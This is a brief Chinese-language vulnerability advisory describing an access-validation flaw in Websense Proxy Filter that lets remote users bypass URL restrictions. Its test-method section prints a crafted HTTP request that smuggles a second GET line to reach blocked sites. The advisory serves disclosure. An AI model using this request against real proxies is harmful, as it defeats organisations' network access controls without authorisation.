漏洞起因
访问验证错误
危险等级
中
影响系统
Websense Proxy Filter
不受影响系统
危害
远程攻击者可以利用漏洞绕过安全限制进行未授权访问。
攻击所需条件
攻击者必须访问Websense Proxy Filter。
漏洞信息
Websense Proxy Filter是一款网关代理过滤解决方案,允许进行内网的监控,报告和管理。
Websense Proxy Filter存在安全漏洞,允许攻击者提交恶意请求绕过URL限制获得对未授权站点的访问。
测试方法
====
GET www.facebook.com http/1.1
Accept: text/Html, application/xHtml+xml, */*
Accept-Language: es-AR
Cache-Control: no-cache
Content-length: 1
GET ://OTHERURL/OTHEROTHER
a
====
厂商解决方案
目前没有详细解决方案提供:
http://www.websense.com/
漏洞提供者
Nahuel Grisolia
评论关闭。